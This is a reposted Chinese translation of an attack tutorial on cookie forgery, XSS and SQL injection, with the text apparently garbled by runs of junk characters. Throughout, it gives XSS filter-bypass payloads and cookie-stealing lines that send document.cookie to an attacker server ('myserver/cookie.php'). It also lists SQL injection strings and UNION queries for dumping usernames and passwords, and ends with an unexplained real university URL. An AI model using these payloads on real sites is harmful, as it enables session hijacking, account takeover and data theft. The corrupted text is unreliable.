XSS & SQL注入

admin

XSS & SQL注入
. `3 }9 r) Z8 P文章作者：CyberPhreak
% k2 T& _% s/ v9 y% i4 N+ a译文作者：黯魂 [S.S.T]

: ]. s; v6 e5 i: }& S- ]* e
7 W; G' _: b" c% J! P3 CXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
) N. q# z) ?4 k1 \- ~) e, v: gX Web Security - XSS & more X
* z: E* o/ E8 p/ jXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

. @$ U- R& [: e0 i
3 d& h# d  H, f5 z~介绍
7 ~4 E9 l$ Y& N0 K5 v. A' ~+ d
" A# y* E) Y& l5 c4 ]; _在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

XXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
6 e* X4 b* ?0 N; U0 ZXXXXXXXXXXXXXXXXXXXXX

5 V8 G5 g( }4 K# i. G% D7 ~XXXXXXXXXXXXXXXXXXXX
! x+ h3 D4 L- H1 x! U  YX Cookie Editing X
X XSS X
0 v7 x, G4 I+ ?6 T0 f& QX SQL Injection X
XXXXXXXXXXXXXXXXXXXX
' s: H1 v/ s) d7 P
~什么是cookie
+ U- k% G) Y& }, [( c
  d" O# ~: U9 g$ _0 i2 M7 acookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.

+ `! f/ @$ |- c( ^~警告&欺骗

8 u6 y7 f% O% V) V) Y那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:
$ @7 p+ I  z1 c  [8 v1 B; H) ~
6 m5 \3 u/ `1 xstrusername=cnsst;strpassword=cnsst

此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...
- h. u2 N2 x# V1 ~2 C/ u& E! ~
& Y' i6 H; T* U1 ~4 n# Z3 f~什么是XSS
6 A+ B" `  K/ T; x, _2 r8 Z5 s
XSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

! `: K7 C( K+ P0 M3 g~为什么使用XSS

很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
, n: W1 A; }6 P' u! ^你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.
) D1 c# o- a. W) ^, `5 S0 m
2 ~; z' d, D, i5 T0 R~让我们开始吧…

我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.

XSS--跨站脚本&lt;html&gt;
+ w; ?4 R( c/ U, x' i) U5 G
&lt;body&gt;

&lt;form action="" method="GET"&gt;

&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;
; [3 S0 o# c2 l) [9 @
5 a7 D& I& U0 U! N) jScript: &lt;input name="name" type="name"&gt;
+ O6 M; L. k+ k
: |0 `8 p2 n$ J9 z, v9 s, K&lt;input type="submit" value="submit"&gt;

&lt;/form&gt;
7 O8 \& S/ i& f& Q+ g  G7 X
&lt;/body&gt;

&lt;/html&gt;
5 {- ^1 L9 x- }" \' I

* w! R) N( }, R& H. i* E+ U
&lt;?php

& Y, H! f8 E: L! |% m* C$name = $_GET['name'];

7 F! ~/ Z' g( L7 r1 Iecho("Hello $name");

/ k" T% a7 f5 W0 P$ J4 |' v& R?&gt;
复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:
3 t2 s# s4 @' x" i4 }
cnsst
+ w# }- _# @( J% m% r"Hello cnsst!"

, R9 f; @" C  z$ n: x- u引号内的信息就是输出信息..注意看,现在我输入:
! b8 F. s+ ?; e* T+ e3 g& a+ ?- c<script>alert(document.cookie)</script>
7 g1 G9 z# X- i. d  F6 ]6 o
) A. a* F0 i' e; C+ `那么它将会弹出document.cookie!所以它是易受XSS攻击的!

现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...
2 C( d1 B. A! E" d7 R; k9 i. s2 h
8 H8 C+ x* B% C4 p服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...
# X( v/ V- q5 p8 F
已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.
. ?! x+ f3 d( ~$ l! W6 d/ k8 g& M, S
让我们看一个稍微复杂点的例子!
- V, l6 t% L$ t5 [
假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
* w1 n! V6 @6 uscriptalert(document.cookie)/script
/ j. K. y, X/ u3 L1 D或者可能是这样的:
scriptalertdocument.cookie/script
% I  u9 f" t% }5 N2 B8 [
可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.

# f8 ]4 g6 U0 h& v, ?' g让我们继续利用:
& o4 [1 z" ]" `7 J<<script>>alert(document.cookie)<</script>>

你的输出将弹出document.cookie.

现在来看看更狠的:
<<script>>alert((document.cookie))<<//script>>
: d' w+ o5 X0 a) |9 _1 q

他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
scriptalertdocument.cookie/script
或者 <<<script>>>alert(document.cookie)<<</script>>>  
% s. v" `- A) J+ W8 U' n
他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>

# d0 }5 }$ a% d5 l7 A输出像这样:srplert(document.cookie)srp

仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

所有重复多余的部分刚好被替换!现在让我们来点更高级的!
' o, Z/ p/ ?0 T' o
这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
+ J, A: N4 `/ {" t<script>alert(document.cookie)</script>
& C: ]: @- P% ?) E
. b7 ]$ C9 |* t  s3 L" B输出将是:
# P& f4 S, Y3 {' K6 Q* _0 o3 v+ Cscriptalert(document.cookie)script
9 W. O. ]- B( e4 S
看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
- p; [2 k3 g. S; V# G( z& e, m9 T/ f<<script>>alert(document.cookie)<</script>>
/ ~2 S6 F, [7 ?2 \2 @! D
! h  r) b7 g( ?! O输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:

- ^' X& y( R  y! n6 b) ]6 J<
( \0 _. `  i. Q* rscript
>
# C, e) J% ?1 k! f/ k8 p+ jalert
(
document
.
" F  M) J4 o: v: T# z# i$ d4 Ncookie
) o! n. E. Q& B, J. p)
<
/
& {8 w6 h; W0 I1 uscript
+ d' y1 T% w! s>
9 W, s  D; O3 \
- K# I! ]% K: f( W  a
* z% r  Y( s( ~; O. `; M  x看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
% \% X& u$ }( n. B8 g<
1 `$ R) e* p& B7 f( f% A3 vs
c
r
+ n3 k) Y9 ~8 v/ L: q5 |# d* pi
* T2 b5 @: `% Dp
) M7 l# y. m* Q+ F0 s$ ]t
>
# q' a3 M4 D* `a
6 v2 N6 H. h' P) R% \: \l
" k( K5 K8 L4 ^) P* W! j5 ye
r
: s; M" i) n7 F+ At
(
d
( B9 B3 ]- p# R+ _$ A! q$ Fo
4 T& @! {0 A" q8 W2 O5 ~c
u
m
& Q- g1 G) i# Y3 t1 m( Oe
n
  H+ r) r* f4 H9 O0 P) e+ r5 }3 At
7 C2 g* o& N4 m* @" X) T) ~+ T.
c
o
o
& |' y8 m% q: Y+ e  C6 {k
9 h0 N9 @$ c5 `5 V) d1 Qi
e
)
<
3 |. m8 @- K/ [! Z3 ~( a/
s
* N6 m8 _4 D% H4 ?" [2 c9 \; d0 rc
r
i
p
- Z/ Q0 `. \* Z0 O# g' lt
* ?2 g# u6 {- c+ p) ]/
0 d: z$ t, N$ G) F6 _3 M>

0 b) J. J) Z+ V" h) {这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)

* Y5 i! R! f% x+ M6 o还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.
' |2 m1 j6 Q9 m& \" p
现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.
) Z6 u' T  m4 g  i/ d& J3 f, c
  M$ [0 Z, b: J, s! _6 p首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.
5 j8 Z( k/ l% _
我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
document.forms(0).action ="http://myserver/myscript.php
这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.
& |6 s" z( D/ `* n, ^& T
. }, u7 h5 d$ C' G6 X4 ?再次假设你在网站上注册了一个帐号,并且可以自定义资料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
# r  {$ B5 c* h, I1 ]或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
javascript:location.href="http://myserver/cookie.php"+document.cookie
1 {8 y2 g! K* o3 t这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.

有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
telnet example.com
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
9 F* d' r7 P9 ?5 H' dUser-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
2 G. N- h( ^4 [Referer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
; i4 I/ C. c0 w" L~什么是SQL注入

SQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;

&lt;body&gt;
" `; ~8 f1 I. H3 {
  U, L' S5 g# J3 }5 W  U&lt;form action="" method="POST"&gt;
4 |/ G( }$ |4 F" S3 l' W, v! I. ^6 m
Username: &lt;input name="name" type="name"&gt;

1 z' x7 D6 L5 CPassword: &lt;input name="password" type="password"&gt;
6 @. M0 T2 X7 n/ K
7 x: o) @; x7 J+ R+ M! Y" M) T9 @&lt;input type="submit" type="submit" value="Submit"&gt;

&lt;/form&gt;

$ X1 s/ f/ Y. h; g9 z: x&lt;/body&gt;
/ Y4 x- k7 P1 `3 S: \
&lt;/html&gt;
) N: ~1 ]* J* _复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!
; x' _; Y) V: w( V! C8 ]/ z
最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

'='
  {, y0 D: v; @4 F% _8 R'OR 1=1--
/ f% E4 t9 g2 v. s'OR a=a--
'OR'
. p7 M. D& d( Z1 {9 [2 P/ ~' d* K
自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:

' K1 R/ _' ]8 K'OR''='
'OR"="
1 K2 r( i/ s+ U0 R/ J$ z) j. h2 v'OR'="
'OR '="
' @! A! C- e4 ^" w'OR "='
; o! N" W: B8 u; K3 r( X- k7 }; Z'OR ''='
'OR '=''
'OR "=''
2 Q! y; [7 ?  d/ s0 w'OR ''="
6 [9 c: K& y6 A. ^

~
现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users

这个查询语句将执行,但是….如果毫无作用呢?
UNION ALL SELECT username,password FROM users WHERE username='OR "='
0 w% M& v1 T6 pAND password='OR "='
: Z% D! e( M1 j- H/ _# j$ r
你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.
( k# A$ Q% g  S. }0 X, [+ q
一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
  M  U# u4 |# J6 l5 }UNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="

现在你看到这个了吗?(我确信你已经看到了)
& _5 I' C1 O( J+ v$ L, N2 x. s4 {http://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
6 n9 _1 f! _/ L( `9 Ghttp://example.com/index.php?article='


. e0 B+ m4 `0 x, H6 Y2 X现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
http://example.com/index.php?article='
http://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
6 U( M0 n/ \- w0 t( g0 ihttp://example.com/index.php?article='OR '=''
9 B5 T8 [* i' j6 M" z6 s' l- Uhttp://example.com/index.php?article='OR''='
http://example.com/index.php?article='OR"'='
http://example.com/index.php?article='OR"''='

尽情发挥自己的创造力!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704